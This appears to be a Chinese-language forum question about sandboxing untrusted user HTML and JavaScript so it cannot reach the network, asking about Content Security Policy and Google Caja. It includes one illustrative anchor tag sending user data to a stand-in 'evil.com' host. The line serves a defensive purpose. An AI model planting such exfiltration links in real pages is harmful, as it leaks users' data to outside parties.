我有一个非常简单的问题,答案可能不太简单:
我想构建一个 html 文件,包括 css 和 javascript。部分代码可能来自外部用户,并阻止它进行任何网络访问。这意味着:没有使用 javascript 的 AJAX 调用,没有程序重定向,甚至没有<img>带有.src=<a>href=
- 内容安全策略似乎几乎可以完成这项工作,但一个普通的旧超链接
<a href="https://evil.com/someUserData">click me</a>似乎仍然有效。 - Google Caja 似乎在做这项工作,但我想完全了解它是如何工作的,而且我是 Java 新手。
所以,我的问题是:
- 有没有什么方法可以通过 CSP 来实现这个沙盒功能?
- Google Caja(使用 uriPolicy)是防止黑客在家中打电话的安全方法吗?
- 还有其他提示和技巧吗?